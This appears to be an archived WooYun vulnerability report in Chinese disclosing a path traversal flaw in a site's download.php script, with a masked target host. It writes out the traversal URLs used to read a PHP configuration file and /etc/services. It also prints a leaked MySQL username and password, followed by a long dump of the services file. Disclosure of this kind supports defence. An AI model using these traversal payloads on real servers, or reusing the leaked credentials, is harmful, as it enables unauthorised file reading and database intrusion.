乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-11: 细节已通知厂商并且等待厂商处理中 2016-01-12: 厂商已经确认,细节仅向厂商公开 2016-01-22: 细节向核心白帽子及相关领域专家公开 2016-02-01: 细节向普通白帽子公开 2016-02-11: 细节向实习白帽子公开 2016-02-22: 细节向公众公开
rt
目标:http://**.**.**.**构造,
http://**.**.**.**/chinese/02_about/download.php?f=../index.php
数据库配置文件
http://**.**.**.**/chinese/02_about/download.php?f=../include/php_script/common.php
common.php中
$DB_str = "mysql,localhost,gercweb, creative, gerc_ctr";
database/DB_class.php中的GetServerInfo函数,
function GetServerInfo($DB_str){ $DB_info = array( 'type' => false, 'host' => false, 'dbname' => false, 'user' => false, 'password' => false ); $Store_info = split(",",$DB_str); $DB_info['type'] = $Store_info[0]; $DB_info['host'] = $Store_info[1]; $DB_info['dbname'] = $Store_info[2]; $DB_info['user'] = $Store_info[3]; $DB_info['password'] = $Store_info[4]; return $DB_info;
数据库用户名密码即为creative/gerc_ctr系统文件services
http://**.**.**.**/chinese/02_about/download.php?f=../../../../../../etc/services
services中
# Network services, Internet style## Note that it is presently the policy of IANA to assign a single well-known# port number for both TCP and UDP; hence, officially ports have two entries# even if the protocol doesn't support UDP operations.## Updated from http://**.**.**.**/assignments/port-numbers and other# sources like http://**.**.**.**/cgi/cvsweb.cgi/src/etc/services .# New ports will be added on request if they have been officially assigned# by IANA and used in the real-world or are needed by a debian package.# If you need a huge list of used numbers please install the nmap package.tcpmux 1/tcp # TCP port service multiplexerecho 7/tcpecho 7/udpdiscard 9/tcp sink nulldiscard 9/udp sink nullsystat 11/tcp usersdaytime 13/tcpdaytime 13/udpnetstat 15/tcpqotd 17/tcp quotemsp 18/tcp # message send protocolmsp 18/udpchargen 19/tcp ttytst sourcechargen 19/udp ttytst sourceftp-data 20/tcpftp 21/tcpfsp 21/udp fspdssh 22/tcp # SSH Remote Login Protocolssh 22/udptelnet 23/tcpsmtp 25/tcp mailtime 37/tcp timservertime 37/udp timserverrlp 39/udp resource # resource locationnameserver 42/tcp name # IEN 116whois 43/tcp nicnametacacs 49/tcp # Login Host Protocol (TACACS)tacacs 49/udpre-mail-ck 50/tcp # Remote Mail Checking Protocolre-mail-ck 50/udpdomain 53/tcp # Domain Name Serverdomain 53/udpmtp 57/tcp # deprecatedtacacs-ds 65/tcp # TACACS-Database Servicetacacs-ds 65/udpbootps 67/tcp # BOOTP serverbootps 67/udpbootpc 68/tcp # BOOTP clientbootpc 68/udptftp 69/udpgopher 70/tcp # Internet Gophergopher 70/udprje 77/tcp netrjsfinger 79/tcphttp 80/tcp www # WorldWideWeb HTTPhttp 80/udp # HyperText Transfer Protocollink 87/tcp ttylinkkerberos 88/tcp kerberos5 krb5 kerberos-sec # Kerberos v5kerberos 88/udp kerberos5 krb5 kerberos-sec # Kerberos v5supdup 95/tcphostnames 101/tcp hostname # usually from sri-niciso-tsap 102/tcp tsap # part of ISODEacr-nema 104/tcp dicom # Digital Imag. & Comm. 300acr-nema 104/udp dicomcsnet-ns 105/tcp cso-ns # also used by CSO name servercsnet-ns 105/udp cso-nsrtelnet 107/tcp # Remote Telnetrtelnet 107/udppop2 109/tcp postoffice pop-2 # POP version 2pop2 109/udp pop-2pop3 110/tcp pop-3 # POP version 3pop3 110/udp pop-3sunrpc 111/tcp portmapper # RPC 4.0 portmappersunrpc 111/udp portmapperauth 113/tcp authentication tap identsftp 115/tcpuucp-path 117/tcpnntp 119/tcp readnews untp # USENET News Transfer Protocolntp 123/tcpntp 123/udp # Network Time Protocolpwdgen 129/tcp # PWDGEN servicepwdgen 129/udploc-srv 135/tcp epmap # Location Serviceloc-srv 135/udp epmapnetbios-ns 137/tcp # NETBIOS Name Servicenetbios-ns 137/udpnetbios-dgm 138/tcp # NETBIOS Datagram Servicenetbios-dgm 138/udpnetbios-ssn 139/tcp # NETBIOS session servicenetbios-ssn 139/udpimap2 143/tcp imap # Interim Mail Access P 2 and 4imap2 143/udp imapsnmp 161/tcp # Simple Net Mgmt Protocolsnmp 161/udpsnmp-trap 162/tcp snmptrap # Traps for SNMPsnmp-trap 162/udp snmptrapcmip-man 163/tcp # ISO mgmt over IP (CMOT)cmip-man 163/udpcmip-agent 164/tcpcmip-agent 164/udpmailq 174/tcp # Mailer transport queue for Zmailermailq 174/udpxdmcp 177/tcp # X Display Mgr. Control Protoxdmcp 177/udpnextstep 178/tcp NeXTStep NextStep # NeXTStep windownextstep 178/udp NeXTStep NextStep # serverbgp 179/tcp # Border Gateway Protocolbgp 179/udpprospero 191/tcp # Cliff Neuman's Prosperoprospero 191/udpirc 194/tcp # Internet Relay Chatirc 194/udpsmux 199/tcp # SNMP Unix Multiplexersmux 199/udpat-rtmp 201/tcp # AppleTalk routingat-rtmp 201/udpat-nbp 202/tcp # AppleTalk name bindingat-nbp 202/udpat-echo 204/tcp # AppleTalk echoat-echo 204/udpat-zis 206/tcp # AppleTalk zone informationat-zis 206/udpqmtp 209/tcp # Quick Mail Transfer Protocolqmtp 209/udpz3950 210/tcp wais # NISO Z39.50 databasez3950 210/udp waisipx 213/tcp # IPXipx 213/udpimap3 220/tcp # Interactive Mail Accessimap3 220/udp # Protocol v3pawserv 345/tcp # Perf Analysis Workbenchpawserv 345/udpzserv 346/tcp # Zebra serverzserv 346/udpfatserv 347/tcp # Fatmen Serverfatserv 347/udprpc2portmap 369/tcprpc2portmap 369/udp # Coda portmappercodaauth2 370/tcpcodaauth2 370/udp # Coda authentication serverclearcase 371/tcp Clearcaseclearcase 371/udp Clearcaseulistserv 372/tcp # UNIX Listservulistserv 372/udpldap 389/tcp # Lightweight Directory Access Protocolldap 389/udpimsp 406/tcp # Interactive Mail Support Protocolimsp 406/udpsvrloc 427/tcp # Server Locationsvrloc 427/udphttps 443/tcp # http protocol over TLS/SSLhttps 443/udpsnpp 444/tcp # Simple Network Paging Protocolsnpp 444/udpmicrosoft-ds 445/tcp # Microsoft Naked CIFSmicrosoft-ds 445/udpkpasswd 464/tcpkpasswd 464/udpsaft 487/tcp # Simple Asynchronous File Transfersaft 487/udpisakmp 500/tcp # IPsec - Internet Security Associationisakmp 500/udp # and Key Management Protocolrtsp 554/tcp # Real Time Stream Control Protocolrtsp 554/udpnqs 607/tcp # Network Queuing systemnqs 607/udpnpmp-local 610/tcp dqs313_qmaster # npmp-local / DQSnpmp-local 610/udp dqs313_qmasternpmp-gui 611/tcp dqs313_execd # npmp-gui / DQSnpmp-gui 611/udp dqs313_execdhmmp-ind 612/tcp dqs313_intercell # HMMP Indication / DQShmmp-ind 612/udp dqs313_intercellqmqp 628/tcpqmqp 628/udpipp 631/tcp # Internet Printing Protocolipp 631/udp省略
..
危害等级:高
漏洞Rank:16
确认时间:2016-01-12 02:14
感謝通報
暂无